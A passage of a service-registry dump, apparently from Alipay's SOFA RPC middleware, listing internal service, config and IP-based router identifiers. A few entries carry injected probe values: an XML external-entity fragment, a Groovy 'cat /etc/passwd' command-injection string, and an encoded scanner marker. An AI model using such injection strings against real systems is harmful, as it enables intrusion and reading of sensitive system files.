ce:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.213.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:mservice_smartcall_intentionFrontService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ioteds.metadata.publish.api.MetadataPublishInnerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.framodel.common.service.facade.api.IndicatorFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.orderfront.common.service.facade.DtQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.common.service.integration.drm.loadtest.LoadTestConfigDrm.cpmCreateShadowPlanNumberLimitConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finbaservice.common.dal.sync.SyncService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mobilepep.drm.NearJarConfigDrm.bizTypePriority,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.revtrans:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilebc.common.service.facade.spi.RecommendConsultCallbackFacade:1.0:mobilecashier@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.CompleteDataService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.ShopPosQueryForManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.85#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cifcommon.business.platform.genericmerchant.facade.StaffQueryExtFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.biz.facade.api.RiskSceneServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.manager.api.WhiteListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csbizcenter.facade.GrayRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.0.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfundtrade:name=com.alipay.finfundtrade.common.service.facade.drm.YEBVirtualTAConfigDrm.taConvertOriginalTaCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cslearn.service.facade.api.MarkFacade:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbposprod.common.service.facade.api.KmsDishConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.settling.common.service.facade.AntProcessQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DACUPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:grmcore_roi_assess_process_callback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.129.203#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.ALIPAYJSESSIONID.shardingRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.PreviewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appfuse.plugin.core.replay.ReplayService:1.0:antforest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_DATAFIN#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.244.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcloaninsight.biz.shared.warn.WarnManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:dmeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:insriskdatasync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.keeper.service.ControllerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.110.76#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finannafccore.common.service.facade.scenario.api.FixedProductFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundprod.common.service.facade.FundWebsiteCustomerPwdMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zdatabusTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zcache:name=com.alipay.zdal.ldc.tair.customerTairCache_dest.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mobilegeocoding:name=com.alipay.dwebupload.client.drm.DomainConfig.aftsDwVIP,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vein.winbillboard.common.service.facade.hbase.TableStatQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ins.service.check@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cfpcenter.common.service.facade.specialbusiness.api.CfpSpecialEnforceWithdrawFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_fixedDeposit2ProcessCallBack1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filecore.service.facade.spi.FileMoveCallBack:1.0:pcinstprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fluxnet.common.service.facade.spi.FluxReceiveService:1.0:bkibdeposit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.182.120#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsearch.common.service.facade.ContentShopSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isdsp.common.service.facade.TemplateServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instinfo.service.facade.spi.InstinfoSystemCallService:1.0:inslifeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:]>&xxe;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmepconnector.facade.service.EpHomeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.revtrans.core.model.drm.RevtransDrmImpl.syncAccountInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.imtmsvcprod.biz.dapply.apply.order.DeviceApplyOrderBizService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.gfpayment.TraceNodeQueryFacade:1.0:fullLinkPaymentTraceNodeQueryFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zerox.common.service.facade.ChangeDefenseAlarmAnalysisFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.transfer.AssetPointTransFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.manage.ProductManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.finservice.FinServiceSeaViewRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.23.236.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.databus.common.manage.facade.HbaseQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.147#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:bonusFeeDownloadCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:YW50c2Nhbk16TXdNalE0TmprdExURXdOREF3TXpBek9BYW50ZW5k@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.194.25#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zcbsalescenter.biz.appointment.AppointmentOperationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:promoprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_doNothingProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebcore.common.facade.service.TransferInCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-TRADE-BATCH#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mrchiswisdom.common.service.facade.api.job.SingleJobInstanceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:ipromofront@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.antvip.client.internal.drm.DrmControl.printStatInfoIntervalSec,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antfortuneall@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.biznamelist.InsOpenBizNameListService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileha.core.service.secretary.WorkAssistantRobotService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echannelcenter.common.service.facade.EchannelAggregationDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.72.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Pub_Servers_TP_S_BKCLOUDFUNDS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zskynet:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mobilerelation.common.service.facade.tlou.TlouPersonEntityRelationEntitySideStrictQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.minitrans.service.facade.unifiedcredit.api.UctransTransVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.biz.service.impl.rpc.IntelligentRecommendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.utils.CountryCodeSwitch.countryCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ocp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileapp.common.service.facade.mobilesecurity.MobileSecurityAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.187.197#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_TEST_BASIC_RATE_LIMIT_RPC-TestBasicRateLimitedStreamServiceDispatcher@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.antfinancial.antchain.cloud.endpoint.facade.CloudManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.huanyu.facade.change.custom.CustomChangePlanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cifin:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.128.180#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.instbizlink.common.service.facade.api.InstLinkChannelFacede:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:customerOrderCollectFlatTaskExecutor@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.loan.impl.support.drm.LpLoanApplyConfigDrm.maxLivingLoanCount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.itemcore.common.service.facade.ItemCZoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acorchestraweb.web.home.sofarest.ServiceParametersRestService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.airbops.mobileDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.secucommunity.speech.api.crowd.CrowdInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.integration.baoxiancore.CoreReportServiceClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_mm_calculate@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.datasync.NewsDataSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_MONITOR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.84.237#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mshopprod.common.service.facade.shop.ShopGrayServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.clearingcenter:name=com.alipay.clearingcenter.core.config.drm.SuspendInstructionConfigDRM.subTransCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:bulidemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_F_PAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.common.service.integration.mydds.BroadNamePredictClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.foodSafetyProdIds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:sigma@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilesync.common.service.spi.api.MobileSyncUpstreamSpiService:1.0:mobilechat@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.risk.FaultInjectReceiptFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.common.service.facade.api.AdvertTriggerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insinformcore.common.service.facade.std.api.config.ClauseConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.opencore.service.facade.PublicAppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.cloudinc:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.jdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbopenprod.common.service.facade.craftsman.CraftsmanManageOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcenter.common.dal.mdata.auto.daointerface.AccountLogReportDAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.eco.smdd.service.api.tinyapp4b.shop.ShopInfoQuery4BService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:pcloanpromobff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.InnerDecisionService:1.0:ins_marketing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pvsofaclient.facade.rest.PvSofaClientFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:normalapp#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.intimateprod.common.service.facade.api.task.TaskBatchInnerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:imaspmng_pmscoreConfigEditProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mobileapp@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.engine.common.api.DecisionStatusService:1.0:pucprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.cfin.cffilefactory.facade.query.FileQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:alideviceinfo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.service.facade.ArgoCompensateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.support.apush.ApushMessageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.tradeexprod.tradeexprod_mservice_ds.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_M_ANTTOCFIN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.kbcontent.common.service.facade.api.statistic.StatisticManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.spi.adapter.facade.UniProcessSpiFacade:1.0:assetinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.koubei.kbbusinessprod.common.service.facade.api.FuBeiConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.baitiaoprod.common.service.facade.mng.TaskUnitFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.integration.chngservice.proto.OpsChangeService:1.0:hnbc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.cardbinMdmTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dcprod.common.service.facade.CommunityRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpSeaViewRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.otherApplyFlag,verssion=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:\"cat /etc/passwd\".execute().text@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergwlite.service.facade.spi.MessageReceiveServiceForLdc:1.0:fascore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.stationsetup.StationSetupFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openitemcore.common.service.facade.api.catalog.BusinessCatalogConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.DebugToolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.predict.service.SelledCountPredictVirtualFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctransquery.common.service.facade.api.FinAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.familycore.facade.FamilyRelationQueryStrictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.common.api.receipt.ReceivePayAckEsbService:1.0:ebppcore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.ProdMappingConfigManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cryptprod.common.service.facade.rest.inf.SceneCryptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.45.144#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.ecdcc:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaLogParamSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","cn.amberdata.admin.service.UserService:1.0:userService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.facade.api.MixQuotationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.SceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fcratecenter_commonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.consultant.drm.ConsultantDRM.fusingConsultantReportClean,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.client.drm.TairToTbaseSwitch.switchToTbase,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mfinquotationprod:name=com.alipay.mfinquotationprod.common.service.facade.drm.MfinquotationprodLDCDrmConfig.supportLoadTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.fop.api.mng.ShopFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","frservcenter@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:iriskperceptcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue12#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cfpcenter.common.service.facade.api.recon.CfpPendingVoucherFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.routeclient.DefaultRouteCoordinator.unCompress,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.agdscc.common.service.facade.precheck.GenericBeanPreCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.media.api.MediaContentQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.221.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbcdp.common.service.facade.space.KbcdpSpaceDictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:nevermore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:insbffweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.operator.common.service.facade.OperatorRelAccountCzoneQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassistantservice.common.service.facade.api.AssistantTenantUiConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.common.AssetAttributeDictionaryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.QRDecodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.airbops.mobileDataSource.slowSql,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.scardcenter.common.service.facade.OfflinepayConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayCardManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dwsap.common.service.facade.httpsqlproxy.DsHttpSqlProxyConfDetailService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:context-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.rpc.TerminalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditpay.amount.PcreditAmountRecoveryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:code_analyze_task@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkpaycore.common.standardfundprod.service.OrderOperateRepeatedlyRemitanceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdtrans.common.service.facade.api.PdTransferOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insclaiminvestprod.facade.institution.InvestigatorManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tfapi.AppFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.console.EnvServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecustprod.common.service.facade.promotion.LifeAppPromotionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlequery.common.service.facade.config.api.RcbBankCardQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changecontrol.callback.service.ChangeCallbackService:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.clientcache.drm.ClientCacheGrayDRM.versionFlagSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.meshyorg.common.service.facade.handler.ApplyCallbackHandler:1.0:snsCampCallbackHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.253.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:zonemng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.MerchantProfileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@openapi#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.kbopenprod.common.service.facade.check.CommodityCheckInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:linku@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openeval.common.service.facade.eval.UpdateUcdpTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M